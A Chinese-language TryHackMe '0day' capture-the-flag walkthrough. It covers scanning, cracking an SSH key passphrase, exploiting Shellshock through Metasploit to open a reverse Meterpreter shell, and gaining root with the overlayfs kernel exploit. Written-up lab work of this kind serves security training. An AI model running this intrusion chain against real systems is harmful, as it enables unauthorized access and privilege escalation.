【Tryhackme】0day(shellshock,内核漏洞提权)
服务扫描
┌──(root?kali)-[~/tryhackme/0day] └─# nmap -sV -Pn -A -O 10.10.209.66 130 ⨯ Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-21 03:52 EDT Nmap scan report for 10.10.209.66 Host is up (0.28s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 57:20:82:3c:62:aa:8f:42:23:c0:b8:93:99:6f:49:9c (DSA) | 2048 4c:40:db:32:64:0d:11:0c:ef:4f:b8:5b:73:9b:c7:6b (RSA) | 256 f7:6f:78:d5:83:52:a6:4d:da:21:3c:55:47:b7:2d:6d (ECDSA) |_ 256 a5:b4:f0:84:b6:a7:8d:eb:0a:9d:3e:74:37:33:65:16 (ED25519) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: 0day Aggressive OS guesses: Linux 3.10 - 3.13 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 5.4 (94%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Android 5.1 (92%) No exact OS matches for host (test conditions non-ideal). Network Distance: 4 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 开启了ssh和http服务
爆破目录
┌──(root?kali)-[~/dirsearch] └─# python3 dirsearch.py -e* -t 100 -u http://10.10.209.66 _|. _ _ _ _ _ _|_ v0.3.8 (_||| _) (/_(_|| (_| ) Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 6100 Error Log: /root/dirsearch/logs/errors-21-10-21_04-07-47.log Target: http://10.10.209.66 [04:07:48] Starting: [04:07:53] 301 - 311B - /admin -> http://10.10.209.66/admin/ [04:07:54] 200 - 0B - /admin/ [04:07:54] 403 - 294B - /admin/.htaccess [04:07:54] 200 - 0B - /admin/?/login [04:07:54] 200 - 0B - /admin/index.html [04:07:57] 301 - 312B - /backup -> http://10.10.209.66/backup/ [04:07:57] 200 - 2KB - /backup/ [04:07:58] 403 - 287B - /cgi-bin/ [04:07:58] 301 - 313B - /cgi-bin -> http://10.10.209.66/cgi-bin/ [04:07:58] 200 - 13B - /cgi-bin/test.cgi [04:07:59] 301 - 309B - /css -> http://10.10.209.66/css/ [04:08:02] 301 - 309B - /img -> http://10.10.209.66/img/ [04:08:02] 200 - 3KB - /index.html [04:08:02] 301 - 308B - /js -> http://10.10.209.66/js/ [04:08:07] 200 - 38B - /robots.txt [04:08:07] 301 - 312B - /secret -> http://10.10.209.66/secret/ [04:08:07] 200 - 109B - /secret/ [04:08:07] 403 - 292B - /server-status [04:08:07] 403 - 293B - /server-status/ [04:08:09] 200 - 0B - /uploads/ [04:08:09] 301 - 313B - /uploads -> http://10.10.209.66/uploads/ 在/robots.txt页面受到了作者的嘲讽
You really thought it’d be this easy?
在/backup/目录下找到一个ssh 私钥文件,下载到本地用ssh2john破解得到私钥密码
┌──(root?kali)-[~/tryhackme/0day] └─# /usr/share/john/ssh2john.py id_rsa >rsacrack ┌──(root?kali)-[~/tryhackme/0day] └─# ls id_rsa rsacrack ┌──(root?kali)-[~/tryhackme/0day] └─# john --wordlist=/usr/share/wordlists/rockyou.txt rsacrack Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 4 OpenMP threads Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press 'q' or Ctrl-C to abort, almost any other key for status letmein (id_rsa) 1g 0:00:00:42 66.85% (ETA: 03:20:21) 0.02373g/s 227710p/s 227710c/s 227710C/s blackcurrent00..blackcow15 Session aborted 私钥密码是:letmein
所以用户名是什么?找了一圈没找到,难道是兔子洞?
用nikto挖掘网站漏洞
┌──(root?kali)-[~/tryhackme/0day] └─# nikto -h http://10.10.209.66 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.209.66 + Target Hostname: 10.10.209.66 + Target Port: 80 + Start Time: 2021-10-21 03:54:16 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.4.7 (Ubuntu) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Server may leak inodes via ETags, header found with file /, inode: bd1, size: 5ae57bb9a1192, mtime: gzip + Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Uncommon header '93e4r0-cve-2014-6271' found, with contents: true + OSVDB-112004: /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278). + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS + OSVDB-3092: /admin/: This might be interesting... + OSVDB-3092: /backup/: This might be interesting... + OSVDB-3268: /css/: Directory indexing found. + OSVDB-3092: /css/: This might be interesting... + OSVDB-3268: /img/: Directory indexing found. + OSVDB-3092: /img/: This might be interesting... + OSVDB-3092: /secret/: This might be interesting... + OSVDB-3092: /cgi-bin/test.cgi: This might be interesting... + OSVDB-3233: /icons/README: Apache default file found. 发现/cgi-bin/test.cgi很可能存在shellshock漏洞(版本号CVE-2014-6278)
攻击
在msf里搜索这个漏洞
msf6 > search shellshock 2014-6278 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner 1 exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock) 2 exploit/multi/http/cups_bash_env_exec 2014-09-24 excellent Yes CUPS Filter Bash Environment Variable Code Injection (Shellshock)选择探测模块scanner/http/apache_mod_cgi_bash_env
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set targeturi /cgi-bin/test.cgi targeturi => /cgi-bin/test.cgi msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > run [+] uid=33(www-data) gid=33(www-data) groups=33(www-data) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed 探测成功了!
再次选择攻击模块multi/http/apache_mod_cgi_bash_env_exec
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set targeturi /cgi-bin/test.cgi targeturi => /cgi-bin/test.cgi msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run [*] Started reverse TCP handler on 10.13.21.169:4444 [*] Command Stager progress - 100.46% done (1097/1092 bytes) [*] Sending stage (980808 bytes) to 10.10.209.66 [*] Meterpreter session 1 opened (10.13.21.169:4444 -> 10.10.209.66:33088) at 2021-10-21 04:23:00 -0400 meterpreter > shell Process 1057 created. Channel 1 created. id uid=33(www-data) gid=33(www-data) groups=33(www-data) whoami www-data成功拿到初始shell
在/home/ryan拿到user.txt
提权
查看系统版本
uname -a Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux 这个是一个比较老的linux版本了,因此我们从内核提权的思路出发
把内核枚举脚本(内核提权枚举脚本推荐linux-exploit-suggester.sh)通过msf传到靶机,枚举内核提权信息,这里列举三个highly probable的提权脚本一个个尝试
[+] [CVE-2016-5195] dirtycow Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails Exposure: highly probable Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ] Download URL: https://www.exploit-db.com/download/40611 Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh [+] [CVE-2016-5195] dirtycow 2 Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails Exposure: highly probable Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic} Download URL: https://www.exploit-db.com/download/40839 ext-url: https://www.exploit-db.com/download/40847 Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh [+] [CVE-2015-1328] overlayfs Details: http://seclists.org/oss-sec/2015/q2/717 Exposure: highly probable Tags: [ ubuntu=(12.04|14.04){kernel:3.13.0-(2|3|4|5)*-generic} ],ubuntu=(14.10|15.04){kernel:3.(13|16).0-*-generic} Download URL: https://www.exploit-db.com/download/37292 最后37292这个脚本证实可以提权成功
上传脚本到靶机
meterpreter > upload /root/tryhackme/0day/37292.c ./37292.c [*] uploading : /root/tryhackme/0day/37292.c -> ./37292.c [*] Uploaded -1.00 B of 5.00 KiB (-0.02%): /root/tryhackme/0day/37292.c -> ./37292.c [*] uploaded : /root/tryhackme/0day/37292.c -> ./37292.c meterpreter > shell Process 6979 created. Channel 12 created. ls 37292.c 40611.c bLMlC dirtyc0w foo l.txt les.sh在靶机上编译、执行这个攻击脚本。拿到root flag
gcc 37292.c -o ofs ls 37292.c 40611.c bLMlC dirtyc0w foo l.txt les.sh ofs chmod +x ofs id uid=33(www-data) gid=33(www-data) groups=33(www-data) ./ofs spawning threads mount #1 mount #2 child threads done /etc/ld.so.preload created creating shared library sh: 0: can't access tty; job control turned off # id uid=0(root) gid=0(root) groups=0(root),33(www-data) # cat /root/root.txt THM{g00d_j0b_0day_is_Pleased}[温馨提示:高防服务器能助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。]
[图文来源于网络,不代表本站立场,如有侵权,请联系高防服务器网删除]